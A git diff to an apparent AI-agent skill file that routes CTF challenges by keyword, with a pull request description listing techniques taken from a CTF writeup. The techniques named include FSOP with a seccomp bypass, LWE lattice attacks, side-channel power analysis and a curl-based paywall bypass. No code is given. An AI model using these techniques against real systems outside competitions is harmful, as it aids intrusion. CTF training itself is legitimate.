 - "RSA", "AES", "cipher", "encrypt", "prime", "modulus", "lattice", "LWE", "GCM" -> crypto
 - "XSS", "SQL", "injection", "cookie", "JWT", "SSRF" -> web
-- "disk image", "memory dump", "packet capture", "registry", "power trace", "side-channel", "spectrogram" -> forensics
+- "disk image", "memory dump", "packet capture", "registry", "power trace", "side-channel", "spectrogram", "audio tracks", "MKV" -> forensics
 - "find", "locate", "identify", "who", "where" -> osint
 - "obfuscated", "packed", "C2", "malware", "beacon" -> malware
-- "jail", "sandbox", "escape", "encoding", "signal", "game", "Nim", "commitment" -> misc
+- "jail", "sandbox", "escape", "encoding", "signal", "game", "Nim", "commitment", "Gray code" -> misc
 
 **By service behavior:**
 - Port with interactive prompt, crash on long input -> pwn

--- a/solve-challenge/SKILL.md
+++ b/solve-challenge/SKILL.md
@@ -37,12 +37,12 @@ Determine the primary category, then invoke the matching skill.
 
 **By challenge description keywords:**
 - "buffer overflow", "ROP", "shellcode", "libc", "heap" -> pwn
-- "RSA", "AES", "cipher", "encrypt", "prime", "modulus" -> crypto
+- "RSA", "AES", "cipher", "encrypt", "prime", "modulus", "lattice", "LWE", "GCM" -> crypto
 - "XSS", "SQL", "injection", "cookie", "JWT", "SSRF" -> web
-- "disk image", "memory dump", "packet capture", "registry" -> forensics
+- "disk image", "memory dump", "packet capture", "registry", "power trace", "side-channel", "spectrogram" -> forensics
 - "find", "locate", "identify", "who", "where" -> osint
 - "obfuscated", "packed", "C2", "malware", "beacon" -> malware
-- "jail", "sandbox", "escape", "encoding", "signal" -> misc
+- "jail", "sandbox", "escape", "encoding", "signal", "game", "Nim", "commitment" -> misc
 
 **By service behavior:**
 - Port with interactive prompt, crash on long input -> pwn
@@ -86,6 +86,10 @@ If your first approach doesn't work:
 - Misc + Crypto: jail escape requires building crypto primitives under constraints
 - OSINT + Stego: social media posts with unicode homoglyph steganography (Cyrillic lookalikes encode bits)
 - Web + Forensics: paywall bypass (curl reveals content hidden by CSS overlays)
+- Misc + Crypto + Game Theory: multi-phase interactive challenges with AES decryption → HMAC commitment → combinatorial game solving (GF(256) Nim)
+- Crypto + Geometry + Lattice: multi-layer challenges progressing from spatial reconstruction → subspace recovery → LWE solving → AES-GCM decryption
+- Forensics + Signal Processing: power traces / side-channel analysis requiring statistical analysis of measurement data
+- Forensics + Network + Encoding: timing-based encoding in PCAP (inter-packet intervals encode binary data)
 
 ## Flag Formats
 


### PR DESCRIPTION
## Summary

- **14 new technique sections** across 7 skill categories extracted from the [EHAX CTF 2026 writeup](https://hackmd.io/@TeamInvisible/B1j2PObKbl)
- **Description keyword enrichment** for 4 skills to improve agent discovery (forensics, crypto, pwn, misc)
- **All 9 skills pass `skills-ref validate`** — verified against official Agent Skills spec

## New Techniques by Category

| Skill | Technique | Source Challenge |
|-------|-----------|----------------|
| ctf-forensics | Custom freq DTMF decoding | Quantum Message |
| ctf-forensics | JPEG DQT table LSB steganography | Jpeg Soul |
| ctf-forensics | Side-channel power analysis (DPA) | Power Leak |
| ctf-forensics | Packet interval timing encoding | Breathing Void |
| ctf-crypto | LWE lattice attack via CVP/Babai | Dream Labyrinth |
| ctf-crypto | AES-GCM with derived keys | Dream Labyrinth |
| ctf-misc | Multi-phase interactive crypto game | The Architect's Gambit |
| ctf-misc | HMAC commitment-reveal + GF(256) Nim | The Architect's Gambit |
| ctf-osint | Street View panorama matching | amnothappyanymore |
| ctf-pwn | FSOP + seccomp bypass (openat/mmap/write) | Revenge of Womp Womp |
| solve-challenge | 4 new multi-category patterns | Cross-cutting |

## Test plan

- [x] All 9 skills pass `skills-ref validate`
- [x] All SKILL.md files under 500 lines
- [x] Descriptions under 1024 chars
- [x] No disallowed frontmatter fields